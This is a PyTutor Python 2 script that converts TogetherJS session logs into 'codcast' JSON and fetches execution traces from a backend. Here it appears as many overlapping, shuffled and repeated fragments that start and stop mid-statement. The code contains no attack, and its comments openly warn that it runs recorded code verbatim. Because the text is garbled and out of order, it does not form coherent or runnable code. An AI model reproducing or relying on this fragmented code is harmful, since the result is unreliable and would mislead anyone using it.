'hashchange' and firstClientId and tjs['clientId'] != firstClientId: continue raw_events.append(rec)", "lastEditCodeEvent['togetherjs']['delta']['d']: # assert tjs['delta']['t'] >= lastEditCodeEvent['togetherjs']['delta']['t'] # continue # get outta here! events", "events = [] for e in raw_events: tjs = e['togetherjs'] # clean up", "CODE VERBATIM TO GENERATE TRACES FOR THE CACHE; IF THE CODE IS MALICIOUS,", "= {'color': '#8d549f'} # not sure if this is necessary # TODO: we", "ms = int(time.mktime(dt.timetuple())) * 1000 # for app.codeEdit events, look up who the", "sure if this is necessary # TODO: we need to add frameNum field", "rec firstClientId = tjs['clientId'] # don't append any initialAppState events: if typ ==", "# assert tjs['delta']['t'] >= lastEditCodeEvent['togetherjs']['delta']['t'] # continue # get outta here! events =", "'sameUrl': True, 'peer': {'color': '#8d549f'}} # not sure if this is necessary events.insert(0,", "since we'll assume that's who # initiated the session if not firstInitialAppState and", "element of myTraceCache is a pair of [appState, cached trace from server] myTraceCache", "to essentially create a python-based driver (maybe using requests) to make the proper", "events might also be duplicated - maybe ONLY take hashchange events for YOURSELF?", "[] # Key: delta 'd' field, value: list of code edit events with", "WARNING: DO NOT RUN THIS ON UNTRUSTED CODE YET, SINCE IT WILL SIMPLY", "call_opt_backend(myAppState) #print r.url serverResultJson = r.json() if 'trace' in serverResultJson: myTrace = serverResultJson['trace']", "the session) since TogetherJS logs everyone's actions separately - app.editCode events are DEFINITELY", "TO GENERATE TRACES FOR THE CACHE; IF THE CODE IS MALICIOUS, THEN IT", "use app.executeCode events as 'sync points' since we know that the code in", "all_code_edits_by_deltas[d][0] firstEditTimestamp = firstEdit['delta']['t'] # sanity check: note that this will fail if", "in events: if e['type'] == 'app.executeCode': myAppState = e['myAppState'] r = call_opt_backend(myAppState) #print", "output to stdout # created: 2018-05-27 ''' NB: now that i think about", "json import os import sys import time from call_opt_backend import call_opt_backend # somewhat", "need to add frameNum field later on; or maybe just add it here?!?", "{'color': '#8d549f'}} # not sure if this is necessary events.insert(0, startRecordingDemoEvent) # ok", "pair of [appState, cached trace from server] myTraceCache = [] for e in", "= tjs['delta']['t'] assert d in all_code_edits_by_deltas firstEdit = all_code_edits_by_deltas[d][0] firstEditTimestamp = firstEdit['delta']['t'] #", "events: if e['type'] == 'app.executeCode': myAppState = e['myAppState'] r = call_opt_backend(myAppState) #print r.url", "== 'app.executeCode': myAppState = e['myAppState'] r = call_opt_backend(myAppState) #print r.url serverResultJson = r.json()", "since TogetherJS logs everyone's actions separately - app.editCode events are DEFINITELY duplicated -", "import os import sys import time from call_opt_backend import call_opt_backend # somewhat modeled", "POSSIBLY HARM YOUR COMPUTER!!! - the solution to this is to run the", "initialAppState['clientId'] = firstInitialAppState['togetherjs']['clientId'] # augment it firstDt = dateutil.parser.parse(firstInitialAppState['date']) firstTs = int(time.mktime(firstDt.timetuple())) *", "will take care of # mapping clientId's to usernames for us ... #", "the FIRST initialAppState since we'll assume that's who # initiated the session if", "only for the firstClientId user if typ == 'hashchange' and firstClientId and tjs['clientId']", "codcast format tjs['ts'] = ms tjs['sameUrl'] = True tjs['peer'] = {'color': '#8d549f'} #", "necessary events.insert(0, startRecordingDemoEvent) # ok finally produce the codcast object and write it", "'togetherjs': continue tjs = rec['togetherjs'] typ = tjs['type'] if typ not in ALL_LEGIT_TYPES:", "format, which is readable by # ../js/recorder.ts and ../js/demovideo.ts # # writes JSON", "# somewhat modeled after ../js/demovideo.ts ALL_LEGIT_TYPES = ( 'app.initialAppState', 'hello', 'peer-update', 'form-update', 'cursor-update',", "throughout the # session; keep the latest one) clientIdtoUsername = {} firstInitialAppState =", "cached trace from server] myTraceCache = [] for e in events: if e['type']", "- app.hashchange events might also be duplicated - maybe ONLY take hashchange events", "firstEditTimestamp = firstEdit['delta']['t'] # sanity check: note that this will fail if we", "take place at vastly # different points in time, but let's cross that", "that bridge when # we get to it assert firstEditTimestamp <= t assert", "there are N people in the session) since TogetherJS logs everyone's actions separately", "DEFINITELY duplicated - app.hashchange events might also be duplicated - maybe ONLY take", "hashchange: log them only for the firstClientId user if typ == 'hashchange' and", "''' from collections import defaultdict import dateutil.parser import json import os import sys", "ms tjs['sameUrl'] = True tjs['peer'] = {'color': '#8d549f'} # not sure if this", "tjs['type'] == 'app.editCode': d = tjs['delta']['d'] t = tjs['delta']['t'] assert d in all_code_edits_by_deltas", "{'color': '#8d549f'} # not sure if this is necessary # TODO: we need", "* 1000 # milliseconds # prepend a special app.startRecordingDemo event to events startRecordingDemoEvent", "of events are duplicated (or repeated N times if there are N people", "r.url serverResultJson = r.json() if 'trace' in serverResultJson: myTrace = serverResultJson['trace'] myTraceCache.append([myAppState, myTrace])", "note that this will fail if we have multiple # identical sets of", "of code edit events with that same 'd' # # NB: this won't", "same with hashchange: log them only for the firstClientId user if typ ==", "print >> sys.stderr, \"ERROR while running\", myAppState, '->', serverResultJson initialAppState = firstInitialAppState['togetherjs']['myAppState'] initialAppState['clientId']", "current username (might change throughout the # session; keep the latest one) clientIdtoUsername", "get to it assert firstEditTimestamp <= t assert t - firstEditTimestamp < 5000", "MALICIOUS, THEN IT WILL POSSIBLY HARM YOUR COMPUTER!!! - the solution to this", "'app.executeCode', 'app.updateOutput', 'app.aceChangeCursor', 'app.aceChangeSelection', 'pyCodeOutputDivScroll', 'app.hashchange', ) # TODO: maybe we don't need", "initialAppState events: if typ == 'app.initialAppState': continue if typ == 'app.editCode': all_code_edits_by_deltas[tjs['delta']['d']].append(tjs) #", "ones. if typ == 'app.editCode' and firstClientId and tjs['clientId'] != firstClientId: continue #", "t - firstEditTimestamp < 5000 # give it a 5-second buffer for sanity", "the latest one) clientIdtoUsername = {} firstInitialAppState = None firstClientId = None raw_events", "from call_opt_backend import call_opt_backend # somewhat modeled after ../js/demovideo.ts ALL_LEGIT_TYPES = ( 'app.initialAppState',", "...do the same with hashchange: log them only for the firstClientId user if", "(might change throughout the # session; keep the latest one) clientIdtoUsername = {}", "if this is necessary events.insert(0, startRecordingDemoEvent) # ok finally produce the codcast object", "the clientId for this event! # add these fields to match codcast format", "their clientId, which may be # different than your own clientId if tjs['type']", "up and append to final events dt = dateutil.parser.parse(e['date']) # get timestamp in", "5-second buffer for sanity checking tjs['clientId'] = firstEdit['clientId'] # change the clientId for", "and append to final events dt = dateutil.parser.parse(e['date']) # get timestamp in milliseconds", "collections import defaultdict import dateutil.parser import json import os import sys import time", "events matter - maybe we can use app.executeCode events as 'sync points' since", "hashchange events for YOURSELF? HUGE WARNING: DO NOT RUN THIS ON UNTRUSTED CODE", "typ not in ALL_LEGIT_TYPES: continue # read only the FIRST initialAppState since we'll", "# continue # get outta here! events = [] for e in raw_events:", "firstEdit['clientId'] # change the clientId for this event! # add these fields to", "events belonging # to the firstClientId user and discard all other ones. if", "# TODO: we need to add frameNum field later on; or maybe just", "THE CACHE; IF THE CODE IS MALICIOUS, THEN IT WILL POSSIBLY HARM YOUR", "we have multiple # identical sets of edits that take place at vastly", "more, it's not entirely clear to me whether you can always tell who", "'cursor-update', 'chat', 'app.editCode', 'app.executeCode', 'app.updateOutput', 'app.aceChangeCursor', 'app.aceChangeSelection', 'pyCodeOutputDivScroll', 'app.hashchange', ) # TODO: maybe", "cache; we need to essentially create a python-based driver (maybe using requests) to", "import call_opt_backend # somewhat modeled after ../js/demovideo.ts ALL_LEGIT_TYPES = ( 'app.initialAppState', 'hello', 'peer-update',", "'app.hashchange', ) # TODO: maybe we don't need this since TogetherJS will take", "on the actual server to generate a real trace for the trace cache;", "that same 'd' # # NB: this won't be fully accurate if there", "the session if not firstInitialAppState and typ == 'app.initialAppState': firstInitialAppState = rec firstClientId", "solution to this is to run the code on the actual server to", "if typ not in ALL_LEGIT_TYPES: continue # read only the FIRST initialAppState since", "firstDt = dateutil.parser.parse(firstInitialAppState['date']) firstTs = int(time.mktime(firstDt.timetuple())) * 1000 # milliseconds # prepend a", "# # writes JSON output to stdout # created: 2018-05-27 ''' NB: now", "with any kind of certainty. oh wells, throw up our hands for nows.", "'chat', 'app.editCode', 'app.executeCode', 'app.updateOutput', 'app.aceChangeCursor', 'app.aceChangeSelection', 'pyCodeOutputDivScroll', 'app.hashchange', ) # TODO: maybe we", "startRecordingDemoEvent) # ok finally produce the codcast object and write it out to", "'app.initialAppState': continue if typ == 'app.editCode': all_code_edits_by_deltas[tjs['delta']['d']].append(tjs) # it's really tricky to log", "in milliseconds ms = int(time.mktime(dt.timetuple())) * 1000 # for app.codeEdit events, look up", "YET, SINCE IT WILL SIMPLY EXECUTE THE CODE VERBATIM TO GENERATE TRACES FOR", "produce the codcast object and write it out to stdout as JSON codcastObj", "it out to stdout as JSON codcastObj = {'initialAppState': initialAppState, 'events': events, 'traceCache':", "'app.aceChangeSelection', 'pyCodeOutputDivScroll', 'app.hashchange', ) # TODO: maybe we don't need this since TogetherJS", "codcast object and write it out to stdout as JSON codcastObj = {'initialAppState':", ") # TODO: maybe we don't need this since TogetherJS will take care", "while running\", myAppState, '->', serverResultJson initialAppState = firstInitialAppState['togetherjs']['myAppState'] initialAppState['clientId'] = firstInitialAppState['togetherjs']['clientId'] # augment", "who # initiated the session if not firstInitialAppState and typ == 'app.initialAppState': firstInitialAppState", "often appear as # duplicates (or even more copies if there are more", "# ../../v3/opt_togetherjs/server.js # # and turns it into the codcast format, which is", "'pyCodeOutputDivScroll', 'app.hashchange', ) # TODO: maybe we don't need this since TogetherJS will", "when # we get to it assert firstEditTimestamp <= t assert t -", "myTraceCache is a pair of [appState, cached trace from server] myTraceCache = []", "= dateutil.parser.parse(e['date']) # get timestamp in milliseconds ms = int(time.mktime(dt.timetuple())) * 1000 #", "initialAppState = firstInitialAppState['togetherjs']['myAppState'] initialAppState['clientId'] = firstInitialAppState['togetherjs']['clientId'] # augment it firstDt = dateutil.parser.parse(firstInitialAppState['date']) firstTs", "care of # mapping clientId's to usernames for us ... # # Key:", "here! events = [] for e in raw_events: tjs = e['togetherjs'] # clean", "dateutil.parser.parse(firstInitialAppState['date']) firstTs = int(time.mktime(firstDt.timetuple())) * 1000 # milliseconds # prepend a special app.startRecordingDemo", "repeated N times if there are N people in the session) since TogetherJS", "# ok finally produce the codcast object and write it out to stdout", "maybe ONLY take hashchange events for YOURSELF? HUGE WARNING: DO NOT RUN THIS", "for us ... # # Key: clientId, Value: current username (might change throughout", "THE CODE VERBATIM TO GENERATE TRACES FOR THE CACHE; IF THE CODE IS", "'ts': firstTs, 'sameUrl': True, 'peer': {'color': '#8d549f'}} # not sure if this is", "if tjs['delta']['d'] == lastEditCodeEvent['togetherjs']['delta']['d']: # assert tjs['delta']['t'] >= lastEditCodeEvent['togetherjs']['delta']['t'] # continue # get", "RUN THIS ON UNTRUSTED CODE YET, SINCE IT WILL SIMPLY EXECUTE THE CODE", "sure how much hashchange events matter - maybe we can use app.executeCode events", "'app.aceChangeCursor', 'app.aceChangeSelection', 'pyCodeOutputDivScroll', 'app.hashchange', ) # TODO: maybe we don't need this since", "tjs['delta']['t'] >= lastEditCodeEvent['togetherjs']['delta']['t'] # continue # get outta here! events = [] for", "- maybe ONLY take hashchange events for YOURSELF? HUGE WARNING: DO NOT RUN", "one big challenge is that some types of events are duplicated (or repeated", "firstEdit = all_code_edits_by_deltas[d][0] firstEditTimestamp = firstEdit['delta']['t'] # sanity check: note that this will", "with hashchange: log them only for the firstClientId user if typ == 'hashchange'", "after ../js/demovideo.ts ALL_LEGIT_TYPES = ( 'app.initialAppState', 'hello', 'peer-update', 'form-update', 'cursor-update', 'chat', 'app.editCode', 'app.executeCode',", "# different than your own clientId if tjs['type'] == 'app.editCode': d = tjs['delta']['d']", "latest one) clientIdtoUsername = {} firstInitialAppState = None firstClientId = None raw_events =", "= firstEdit['clientId'] # change the clientId for this event! # add these fields", "language TODOs: - not sure how much hashchange events matter - maybe we", "= all_code_edits_by_deltas[d][0] firstEditTimestamp = firstEdit['delta']['t'] # sanity check: note that this will fail", "entirely clear to me whether you can always tell who initiated an app.editCode", "- the solution to this is to run the code on the actual", "== 'hashchange' and firstClientId and tjs['clientId'] != firstClientId: continue raw_events.append(rec) # if tjs['delta']['d']", "augment it firstDt = dateutil.parser.parse(firstInitialAppState['date']) firstTs = int(time.mktime(firstDt.timetuple())) * 1000 # milliseconds #", "not firstInitialAppState and typ == 'app.initialAppState': firstInitialAppState = rec firstClientId = tjs['clientId'] #", "line in open(sys.argv[1]): rec = json.loads(line) if rec['type'] != 'togetherjs': continue tjs =", "'clientId': firstInitialAppState['togetherjs']['clientId'], 'ts': firstTs, 'sameUrl': True, 'peer': {'color': '#8d549f'}} # not sure if", "raw_events: tjs = e['togetherjs'] # clean up and append to final events dt", "also be duplicated - maybe ONLY take hashchange events for YOURSELF? HUGE WARNING:", "# give it a 5-second buffer for sanity checking tjs['clientId'] = firstEdit['clientId'] #", "to generate a real trace for the trace cache; we need to essentially", "from collections import defaultdict import dateutil.parser import json import os import sys import", "# read only the FIRST initialAppState since we'll assume that's who # initiated", "and firstClientId and tjs['clientId'] != firstClientId: continue raw_events.append(rec) # if tjs['delta']['d'] == lastEditCodeEvent['togetherjs']['delta']['d']:", "= tjs['clientId'] # don't append any initialAppState events: if typ == 'app.initialAppState': continue", "for app.codeEdit events, look up who the ORIGINAL PERSON was who # initiated", "if typ == 'app.initialAppState': continue if typ == 'app.editCode': all_code_edits_by_deltas[tjs['delta']['d']].append(tjs) # it's really", "fields to match codcast format tjs['ts'] = ms tjs['sameUrl'] = True tjs['peer'] =", "TogetherJS will take care of # mapping clientId's to usernames for us ...", "in serverResultJson: myTrace = serverResultJson['trace'] myTraceCache.append([myAppState, myTrace]) else: print >> sys.stderr, \"ERROR while", "# writes JSON output to stdout # created: 2018-05-27 ''' NB: now that", "various OPT backends, depending on language TODOs: - not sure how much hashchange", "tjs['ts'] = ms tjs['sameUrl'] = True tjs['peer'] = {'color': '#8d549f'} # not sure", "myAppState, '->', serverResultJson initialAppState = firstInitialAppState['togetherjs']['myAppState'] initialAppState['clientId'] = firstInitialAppState['togetherjs']['clientId'] # augment it firstDt", "- app.editCode events are DEFINITELY duplicated - app.hashchange events might also be duplicated", "people in the session). # the easiest way to manage it is to", "contents when they execute ''' from collections import defaultdict import dateutil.parser import json", "recorded by # ../../v3/opt_togetherjs/server.js # # and turns it into the codcast format,", "COMPUTER!!! - the solution to this is to run the code on the", "me whether you can always tell who initiated an app.editCode event with any", "of certainty. oh wells, throw up our hands for nows. NB: one big", "can use app.executeCode events as 'sync points' since we know that the code", "edits that take place at vastly # different points in time, but let's", "THEN IT WILL POSSIBLY HARM YOUR COMPUTER!!! - the solution to this is", "than your own clientId if tjs['type'] == 'app.editCode': d = tjs['delta']['d'] t =", "1000 # milliseconds # prepend a special app.startRecordingDemo event to events startRecordingDemoEvent =", "execute ''' from collections import defaultdict import dateutil.parser import json import os import", "= [] for e in events: if e['type'] == 'app.executeCode': myAppState = e['myAppState']", "to manage it is to record only editCode events belonging # to the", "= r.json() if 'trace' in serverResultJson: myTrace = serverResultJson['trace'] myTraceCache.append([myAppState, myTrace]) else: print", "since they often appear as # duplicates (or even more copies if there", "i think about it more, it's not entirely clear to me whether you", "all_code_edits_by_deltas[tjs['delta']['d']].append(tjs) # it's really tricky to log editCode events since they often appear", "CODE IS MALICIOUS, THEN IT WILL POSSIBLY HARM YOUR COMPUTER!!! - the solution", "../../v3/opt_togetherjs/server.js # # and turns it into the codcast format, which is readable", "is to run the code on the actual server to generate a real", "in ALL_LEGIT_TYPES: continue # read only the FIRST initialAppState since we'll assume that's", "app.executeCode events as 'sync points' since we know that the code in the", "True tjs['peer'] = {'color': '#8d549f'} # not sure if this is necessary #", "defaultdict(list) for line in open(sys.argv[1]): rec = json.loads(line) if rec['type'] != 'togetherjs': continue", "#print r.url serverResultJson = r.json() if 'trace' in serverResultJson: myTrace = serverResultJson['trace'] myTraceCache.append([myAppState,", "tjs['type'] if typ not in ALL_LEGIT_TYPES: continue # read only the FIRST initialAppState", "and turns it into the codcast format, which is readable by # ../js/recorder.ts", "ok finally produce the codcast object and write it out to stdout as", "TODO: we need to add frameNum field later on; or maybe just add", "Key: clientId, Value: current username (might change throughout the # session; keep the", "appear as # duplicates (or even more copies if there are more people", "for line in open(sys.argv[1]): rec = json.loads(line) if rec['type'] != 'togetherjs': continue tjs", "for the trace cache; we need to essentially create a python-based driver (maybe", "# clean up and append to final events dt = dateutil.parser.parse(e['date']) # get", "you can always tell who initiated an app.editCode event with any kind of", "< 5000 # give it a 5-second buffer for sanity checking tjs['clientId'] =", "the # session; keep the latest one) clientIdtoUsername = {} firstInitialAppState = None", "'app.editCode': all_code_edits_by_deltas[tjs['delta']['d']].append(tjs) # it's really tricky to log editCode events since they often", "certainty. oh wells, throw up our hands for nows. NB: one big challenge", "take hashchange events for YOURSELF? HUGE WARNING: DO NOT RUN THIS ON UNTRUSTED", "are duplicated (or repeated N times if there are N people in the", "5000 # give it a 5-second buffer for sanity checking tjs['clientId'] = firstEdit['clientId']", "they execute ''' from collections import defaultdict import dateutil.parser import json import os", "in raw_events: tjs = e['togetherjs'] # clean up and append to final events", "think about it more, it's not entirely clear to me whether you can", "need this since TogetherJS will take care of # mapping clientId's to usernames", "field, value: list of code edit events with that same 'd' # #", "open(sys.argv[1]): rec = json.loads(line) if rec['type'] != 'togetherjs': continue tjs = rec['togetherjs'] typ", "clientId, which may be # different than your own clientId if tjs['type'] ==", "duplicated - app.hashchange events might also be duplicated - maybe ONLY take hashchange", "initiated this edit event, and log their clientId, which may be # different", "firstEdit['delta']['t'] # sanity check: note that this will fail if we have multiple", "if 'trace' in serverResultJson: myTrace = serverResultJson['trace'] myTraceCache.append([myAppState, myTrace]) else: print >> sys.stderr,", "YOURSELF? HUGE WARNING: DO NOT RUN THIS ON UNTRUSTED CODE YET, SINCE IT", "app.editCode event with any kind of certainty. oh wells, throw up our hands", "# # Key: clientId, Value: current username (might change throughout the # session;", "= e['togetherjs'] # clean up and append to final events dt = dateutil.parser.parse(e['date'])", "* 1000 # for app.codeEdit events, look up who the ORIGINAL PERSON was", "int(time.mktime(firstDt.timetuple())) * 1000 # milliseconds # prepend a special app.startRecordingDemo event to events", "if tjs['type'] == 'app.editCode': d = tjs['delta']['d'] t = tjs['delta']['t'] assert d in", "into the codcast format, which is readable by # ../js/recorder.ts and ../js/demovideo.ts #", "log editCode events since they often appear as # duplicates (or even more", "requests) to make the proper calls to the various OPT backends, depending on", "and write it out to stdout as JSON codcastObj = {'initialAppState': initialAppState, 'events':", "ALL_LEGIT_TYPES: continue # read only the FIRST initialAppState since we'll assume that's who", "ON UNTRUSTED CODE YET, SINCE IT WILL SIMPLY EXECUTE THE CODE VERBATIM TO", "= ms tjs['sameUrl'] = True tjs['peer'] = {'color': '#8d549f'} # not sure if", "'app.initialAppState': firstInitialAppState = rec firstClientId = tjs['clientId'] # don't append any initialAppState events:", "tjs['sameUrl'] = True tjs['peer'] = {'color': '#8d549f'} # not sure if this is", "'app.updateOutput', 'app.aceChangeCursor', 'app.aceChangeSelection', 'pyCodeOutputDivScroll', 'app.hashchange', ) # TODO: maybe we don't need this", "dateutil.parser.parse(e['date']) # get timestamp in milliseconds ms = int(time.mktime(dt.timetuple())) * 1000 # for", "to match codcast format tjs['ts'] = ms tjs['sameUrl'] = True tjs['peer'] = {'color':", "session) since TogetherJS logs everyone's actions separately - app.editCode events are DEFINITELY duplicated", "times which have the same 'd' all_code_edits_by_deltas = defaultdict(list) for line in open(sys.argv[1]):", "using requests) to make the proper calls to the various OPT backends, depending", "they often appear as # duplicates (or even more copies if there are", "# sets of edits occurring at vastly different times which have the same", "make the proper calls to the various OPT backends, depending on language TODOs:", "wells, throw up our hands for nows. NB: one big challenge is that", "a codechella session log recorded by # ../../v3/opt_togetherjs/server.js # # and turns it", "NOT RUN THIS ON UNTRUSTED CODE YET, SINCE IT WILL SIMPLY EXECUTE THE", "# different points in time, but let's cross that bridge when # we", "at vastly different times which have the same 'd' all_code_edits_by_deltas = defaultdict(list) for", "accurate if there are several *independent* # sets of edits occurring at vastly", ">= lastEditCodeEvent['togetherjs']['delta']['t'] # continue # get outta here! events = [] for e", "serverResultJson = r.json() if 'trace' in serverResultJson: myTrace = serverResultJson['trace'] myTraceCache.append([myAppState, myTrace]) else:", "people in the session) since TogetherJS logs everyone's actions separately - app.editCode events", "to run the code on the actual server to generate a real trace", "'peer-update', 'form-update', 'cursor-update', 'chat', 'app.editCode', 'app.executeCode', 'app.updateOutput', 'app.aceChangeCursor', 'app.aceChangeSelection', 'pyCodeOutputDivScroll', 'app.hashchange', ) #", "= None raw_events = [] # Key: delta 'd' field, value: list of", "fail if we have multiple # identical sets of edits that take place", "else: print >> sys.stderr, \"ERROR while running\", myAppState, '->', serverResultJson initialAppState = firstInitialAppState['togetherjs']['myAppState']", "ALL_LEGIT_TYPES = ( 'app.initialAppState', 'hello', 'peer-update', 'form-update', 'cursor-update', 'chat', 'app.editCode', 'app.executeCode', 'app.updateOutput', 'app.aceChangeCursor',", "write it out to stdout as JSON codcastObj = {'initialAppState': initialAppState, 'events': events,", "have the same 'd' all_code_edits_by_deltas = defaultdict(list) for line in open(sys.argv[1]): rec =", "the trace cache; we need to essentially create a python-based driver (maybe using", "since we know that the code in the editor contains those contents when", "call_opt_backend # somewhat modeled after ../js/demovideo.ts ALL_LEGIT_TYPES = ( 'app.initialAppState', 'hello', 'peer-update', 'form-update',", "# ...do the same with hashchange: log them only for the firstClientId user", "NB: now that i think about it more, it's not entirely clear to", "object and write it out to stdout as JSON codcastObj = {'initialAppState': initialAppState,", "might also be duplicated - maybe ONLY take hashchange events for YOURSELF? HUGE", "milliseconds ms = int(time.mktime(dt.timetuple())) * 1000 # for app.codeEdit events, look up who", "give it a 5-second buffer for sanity checking tjs['clientId'] = firstEdit['clientId'] # change", "HARM YOUR COMPUTER!!! - the solution to this is to run the code", "events since they often appear as # duplicates (or even more copies if", "the actual server to generate a real trace for the trace cache; we", "format tjs['ts'] = ms tjs['sameUrl'] = True tjs['peer'] = {'color': '#8d549f'} # not", "sys.stderr, \"ERROR while running\", myAppState, '->', serverResultJson initialAppState = firstInitialAppState['togetherjs']['myAppState'] initialAppState['clientId'] = firstInitialAppState['togetherjs']['clientId']", "by # ../js/recorder.ts and ../js/demovideo.ts # # writes JSON output to stdout #", "just add it here?!? events.append(tjs) # each element of myTraceCache is a pair", "# not sure if this is necessary # TODO: we need to add", "= int(time.mktime(dt.timetuple())) * 1000 # for app.codeEdit events, look up who the ORIGINAL", "[] for e in events: if e['type'] == 'app.executeCode': myAppState = e['myAppState'] r", "'->', serverResultJson initialAppState = firstInitialAppState['togetherjs']['myAppState'] initialAppState['clientId'] = firstInitialAppState['togetherjs']['clientId'] # augment it firstDt =", "in time, but let's cross that bridge when # we get to it", "generate a real trace for the trace cache; we need to essentially create", "finally produce the codcast object and write it out to stdout as JSON", "IT WILL SIMPLY EXECUTE THE CODE VERBATIM TO GENERATE TRACES FOR THE CACHE;", "to log editCode events since they often appear as # duplicates (or even", "== 'app.editCode': d = tjs['delta']['d'] t = tjs['delta']['t'] assert d in all_code_edits_by_deltas firstEdit", "times if there are N people in the session) since TogetherJS logs everyone's", "other ones. if typ == 'app.editCode' and firstClientId and tjs['clientId'] != firstClientId: continue", "that some types of events are duplicated (or repeated N times if there", "of # mapping clientId's to usernames for us ... # # Key: clientId,", "firstClientId = tjs['clientId'] # don't append any initialAppState events: if typ == 'app.initialAppState':", "log them only for the firstClientId user if typ == 'hashchange' and firstClientId", "add frameNum field later on; or maybe just add it here?!? events.append(tjs) #", "event with any kind of certainty. oh wells, throw up our hands for", "== 'app.editCode': all_code_edits_by_deltas[tjs['delta']['d']].append(tjs) # it's really tricky to log editCode events since they", "it's really tricky to log editCode events since they often appear as #", "dateutil.parser import json import os import sys import time from call_opt_backend import call_opt_backend", "# change the clientId for this event! # add these fields to match", "not sure how much hashchange events matter - maybe we can use app.executeCode", "e in events: if e['type'] == 'app.executeCode': myAppState = e['myAppState'] r = call_opt_backend(myAppState)", "# don't append any initialAppState events: if typ == 'app.initialAppState': continue if typ", "discard all other ones. if typ == 'app.editCode' and firstClientId and tjs['clientId'] !=", "points in time, but let's cross that bridge when # we get to", "match codcast format tjs['ts'] = ms tjs['sameUrl'] = True tjs['peer'] = {'color': '#8d549f'}", "vastly different times which have the same 'd' all_code_edits_by_deltas = defaultdict(list) for line", "we get to it assert firstEditTimestamp <= t assert t - firstEditTimestamp <", "stdout as JSON codcastObj = {'initialAppState': initialAppState, 'events': events, 'traceCache': myTraceCache} print json.dumps(codcastObj)", "when they execute ''' from collections import defaultdict import dateutil.parser import json import", "these fields to match codcast format tjs['ts'] = ms tjs['sameUrl'] = True tjs['peer']", "change throughout the # session; keep the latest one) clientIdtoUsername = {} firstInitialAppState", "!= 'togetherjs': continue tjs = rec['togetherjs'] typ = tjs['type'] if typ not in", "e['myAppState'] r = call_opt_backend(myAppState) #print r.url serverResultJson = r.json() if 'trace' in serverResultJson:", "and tjs['clientId'] != firstClientId: continue raw_events.append(rec) # if tjs['delta']['d'] == lastEditCodeEvent['togetherjs']['delta']['d']: # assert", "to it assert firstEditTimestamp <= t assert t - firstEditTimestamp < 5000 #", "create a python-based driver (maybe using requests) to make the proper calls to", "tjs['clientId'] = firstEdit['clientId'] # change the clientId for this event! # add these", "readable by # ../js/recorder.ts and ../js/demovideo.ts # # writes JSON output to stdout", "delta 'd' field, value: list of code edit events with that same 'd'", "backends, depending on language TODOs: - not sure how much hashchange events matter", "and log their clientId, which may be # different than your own clientId", "the proper calls to the various OPT backends, depending on language TODOs: -", "tjs['delta']['d'] == lastEditCodeEvent['togetherjs']['delta']['d']: # assert tjs['delta']['t'] >= lastEditCodeEvent['togetherjs']['delta']['t'] # continue # get outta", "== 'app.editCode' and firstClientId and tjs['clientId'] != firstClientId: continue # ...do the same", "stdout # created: 2018-05-27 ''' NB: now that i think about it more,", "prepend a special app.startRecordingDemo event to events startRecordingDemoEvent = {'type': 'app.startRecordingDemo', 'clientId': firstInitialAppState['togetherjs']['clientId'],", "<reponame>ipflsfiles/PyTutor # this script converts a codechella session log recorded by # ../../v3/opt_togetherjs/server.js", "won't be fully accurate if there are several *independent* # sets of edits", "everyone's actions separately - app.editCode events are DEFINITELY duplicated - app.hashchange events might", "are several *independent* # sets of edits occurring at vastly different times which", "WILL POSSIBLY HARM YOUR COMPUTER!!! - the solution to this is to run", "modeled after ../js/demovideo.ts ALL_LEGIT_TYPES = ( 'app.initialAppState', 'hello', 'peer-update', 'form-update', 'cursor-update', 'chat', 'app.editCode',", "on language TODOs: - not sure how much hashchange events matter - maybe", "calls to the various OPT backends, depending on language TODOs: - not sure", "not sure if this is necessary events.insert(0, startRecordingDemoEvent) # ok finally produce the", "your own clientId if tjs['type'] == 'app.editCode': d = tjs['delta']['d'] t = tjs['delta']['t']", "'#8d549f'} # not sure if this is necessary # TODO: we need to", "copies if there are more people in the session). # the easiest way", "editor contains those contents when they execute ''' from collections import defaultdict import", "if rec['type'] != 'togetherjs': continue tjs = rec['togetherjs'] typ = tjs['type'] if typ", "GENERATE TRACES FOR THE CACHE; IF THE CODE IS MALICIOUS, THEN IT WILL", "this is to run the code on the actual server to generate a", "a real trace for the trace cache; we need to essentially create a", "'d' all_code_edits_by_deltas = defaultdict(list) for line in open(sys.argv[1]): rec = json.loads(line) if rec['type']", "and tjs['clientId'] != firstClientId: continue # ...do the same with hashchange: log them", "and firstClientId and tjs['clientId'] != firstClientId: continue # ...do the same with hashchange:", "raw_events.append(rec) # if tjs['delta']['d'] == lastEditCodeEvent['togetherjs']['delta']['d']: # assert tjs['delta']['t'] >= lastEditCodeEvent['togetherjs']['delta']['t'] # continue", "myTrace = serverResultJson['trace'] myTraceCache.append([myAppState, myTrace]) else: print >> sys.stderr, \"ERROR while running\", myAppState,", "we know that the code in the editor contains those contents when they", "usernames for us ... # # Key: clientId, Value: current username (might change", "= serverResultJson['trace'] myTraceCache.append([myAppState, myTrace]) else: print >> sys.stderr, \"ERROR while running\", myAppState, '->',", "# sanity check: note that this will fail if we have multiple #", "this since TogetherJS will take care of # mapping clientId's to usernames for", "to usernames for us ... # # Key: clientId, Value: current username (might", "continue if typ == 'app.editCode': all_code_edits_by_deltas[tjs['delta']['d']].append(tjs) # it's really tricky to log editCode", "the solution to this is to run the code on the actual server", "e in raw_events: tjs = e['togetherjs'] # clean up and append to final", "those contents when they execute ''' from collections import defaultdict import dateutil.parser import", "N times if there are N people in the session) since TogetherJS logs", "python-based driver (maybe using requests) to make the proper calls to the various", "HUGE WARNING: DO NOT RUN THIS ON UNTRUSTED CODE YET, SINCE IT WILL", "# milliseconds # prepend a special app.startRecordingDemo event to events startRecordingDemoEvent = {'type':", "this event! # add these fields to match codcast format tjs['ts'] = ms", "firstInitialAppState = None firstClientId = None raw_events = [] # Key: delta 'd'", "firstEditTimestamp <= t assert t - firstEditTimestamp < 5000 # give it a", "hands for nows. NB: one big challenge is that some types of events", "proper calls to the various OPT backends, depending on language TODOs: - not", "events, look up who the ORIGINAL PERSON was who # initiated this edit", "continue # get outta here! events = [] for e in raw_events: tjs", "YOUR COMPUTER!!! - the solution to this is to run the code on", "events are DEFINITELY duplicated - app.hashchange events might also be duplicated - maybe", "import dateutil.parser import json import os import sys import time from call_opt_backend import", "raw_events = [] # Key: delta 'd' field, value: list of code edit", "rec['togetherjs'] typ = tjs['type'] if typ not in ALL_LEGIT_TYPES: continue # read only", "events: if typ == 'app.initialAppState': continue if typ == 'app.editCode': all_code_edits_by_deltas[tjs['delta']['d']].append(tjs) # it's", "a special app.startRecordingDemo event to events startRecordingDemoEvent = {'type': 'app.startRecordingDemo', 'clientId': firstInitialAppState['togetherjs']['clientId'], 'ts':", 